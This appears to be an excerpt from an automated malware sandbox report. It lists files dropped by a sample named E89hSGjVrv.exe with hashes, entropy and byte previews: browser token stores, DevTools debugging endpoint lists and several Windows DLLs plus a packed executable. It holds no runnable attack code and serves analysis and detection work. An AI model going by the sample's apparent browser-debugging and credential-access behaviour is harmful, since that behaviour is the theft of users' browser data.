                                                                                                                                                                                                                                                        SHA1:45379C244C37C971CA784758CEF210213212CD9D
                                                                                                                                                                                                                                                        SHA-256:63CADDD9705B6201F0F9536A3F532D6EAAEAB64448BB220AC3D8F5B73A46412B
                                                                                                                                                                                                                                                        SHA-512:330FBAAC65ADE23423364A66C76361AC3719FBAFD30EE2CD456F04FCBD9D0AA40263B500652FBB89F43E5B207B67953259796D997371FBC2059CD343CC9802B6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                        Entropy (8bit):3.8399165631744903
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxjxl9Il8ulV/QqJAi3OYRTp9GoyZ+Rf0d1rc:myYD9QHoO899TTz
                                                                                                                                                                                                                                                        MD5:93E07876BF147A10CFE5C5525F906402
                                                                                                                                                                                                                                                        SHA1:586DD5619D63C0F60573E14099A62E909C17114B
                                                                                                                                                                                                                                                        SHA-256:398360F2286E637FE3717FD2DA642C4B2E3A7638269EAF9AC884373ED2548D8B
                                                                                                                                                                                                                                                        SHA-512:2A094196B635A14C4141EE9714293D1888C1968D309B9BA64D6C6477733697ABC446A02B1FD78FDBB16196FF08B454DF38067E53D26CC5557199869E39B25B82
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.I.k.M.O.a.8.7.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.F.X.v.5.w.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                        Entropy (8bit):4.000211969820542
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:zYDm8Ubv03T7Xs0as3qMZklBQGTtF4lGyVff2ueyuf+04l5xB:z0m8Ubv03HVV3qMZsZTtF4lGsf+uDW+P
                                                                                                                                                                                                                                                        MD5:8FCA1357CF2E3078380C24C144882DFA
                                                                                                                                                                                                                                                        SHA1:EFABBA086AA9D59E03FC23B26134BB77A3C2DCAB
                                                                                                                                                                                                                                                        SHA-256:1225B9F79B8702C28C8998FA3A6A4AFE0039762616B2171B25A43F141B66C4E9
                                                                                                                                                                                                                                                        SHA-512:05D664A3667678456ACBE94D9DD092D3BE86C3C4D42F66E43F6E7B9776293FF4BB90EA68AC05890A469829C7356AA8F862E0037090EF2AD33AB0958E45794B67
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.L.M.D.H.6.c.7.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.F.X.v.5.w.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                        Entropy (8bit):3.9048921811140365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7xQxl9Il8ul/CHEaN9sD0WnOu9MvhS61yaqDrfusQ+O9KM5d/vc:aSYD/CHEasD0nu9MvU6dqDzl84
                                                                                                                                                                                                                                                        MD5:43838B46CA51C708EC5CF5ABA5B4CA11
                                                                                                                                                                                                                                                        SHA1:8015893ADC34ED3CC9453AEA4E659A0D805BBF66
                                                                                                                                                                                                                                                        SHA-256:8B4491E0FCC5D5F585ECD529DBB83C261A8F8CF22A06E9075C96CACEBB991478
                                                                                                                                                                                                                                                        SHA-512:F5AAF4414FA92E1E2B119847B4798AD0357386A3E052F2F69D8095BD806FBF2A2E3772A77F3CFFEFA7A32CC5CCA0EF1DB4278C49869FE9E16007F60D01DACCED
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.U.b.3.T.3.h.a.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.v.F.X.v.5.w.
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                                                                        Entropy (8bit):5.402295865432678
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:6NnQVAdHQVSNnQQ9JbQQ4NnQ89Q3NnQlK4dgEQlkNnQIQCNnQsDQsNnQmciwQmJE:6NSAoSNkN6NqK4wkN5NBDN5ciaJNw1QU
                                                                                                                                                                                                                                                        MD5:A2BC2C5A4EC1A2AEB2816AE06C97FE93
                                                                                                                                                                                                                                                        SHA1:B76134F48BBA9B87ED468640FFF6A30EAEDA14C4
                                                                                                                                                                                                                                                        SHA-256:AFE59DD8DD9F74BD07320D9BC57E9EDF065EDD4A16010256562B160C6DC97CD7
                                                                                                                                                                                                                                                        SHA-512:ABBD5A27E0D65AD38E586DB70093625537314E81D6D2789FD9FD71E85BBAE73D7572B4AFFDBCBF1B6DB9430442D13C5D3B249C41FF39912EAC93F516586E30E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/0C036EA8208C41F6EB16D06EE4CFD5CD",.. "id": "0C036EA8208C41F6EB16D06EE4CFD5CD",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/0C036EA8208C41F6EB16D06EE4CFD5CD"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/FF43A03ACB237FA6BA4BB58DA37D04A6",.. "id": "FF43A03ACB237FA6BA4BB58DA37D04A6",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/FF43A03ACB237FA6BA4BB58DA37D04A6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                        Entropy (8bit):5.37673962091376
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:SfNaoQxTEQkfNaoQEKyKmQEKZfNaoQZTDQ7fNaoQIlaH0UrU0U8QIk:6NnQxTEQQNnQvVmQv1NnQZTDQTNnQJHu
                                                                                                                                                                                                                                                        MD5:95F93B76E7492937E5950D01CEB6BF6C
                                                                                                                                                                                                                                                        SHA1:C8D6ED5649D2F612FDC60D83A85B7864C8155E4E
                                                                                                                                                                                                                                                        SHA-256:913E7A9F98AE46F8340BFCBDA7CD74B38DC1FAA0018CE335AC71E9ADDFA82CC0
                                                                                                                                                                                                                                                        SHA-512:1E9496BFB61077D16BE36383AC916ABF474F08C642D535EA2281F28D4A7ECDCDDE225F606CD82B008A3FA5F7A6AC380D3394D7ED966E1F4BD85B853F8C7D4C94
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/967E40962DCAF89C23AC973D07981CA8",.. "id": "967E40962DCAF89C23AC973D07981CA8",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/967E40962DCAF89C23AC973D07981CA8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D414E9F787AE15B1DA8DAA79C415F6B0",.. "id": "D414E9F787AE15B1DA8DAA79C415F6B0",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D414E9F787AE15B1DA8DAA79C415F6B0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1916416
                                                                                                                                                                                                                                                        Entropy (8bit):7.951304925887271
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:WOaQDq1v/ossxzde9Uf9zwOendehMA6NyUlDv:WvQDsdsxxl05ndNy8D
                                                                                                                                                                                                                                                        MD5:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        SHA1:5E74F927EBD1E7811A271ACEC5AEDD2E8BE75353
                                                                                                                                                                                                                                                        SHA-256:DEC01788D36A2CE2175CB87588E7FA92F8052E86BF9CAC3B51AE3A04213E8FBD
                                                                                                                                                                                                                                                        SHA-512:B2AF792E1BFC2239FFB57824AEE782727A9D3886DCE7F3F15A797D031A6E26F8667D9F20C6FBF21D820FC9B50B6FEEB106E9AE1CA88DAB745D93356E9F0EF5BA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f............................. L...........@..........................PL...........@.................................W...k.......H...................0.L...............................L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .@+.........................@...yasgrbfq. ....1.. ..................@...lwauugho......L.....................@....taggant.0... L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):138356
                                                                                                                                                                                                                                                        Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                        MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                        SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                        SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                        SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                        Malicious:false
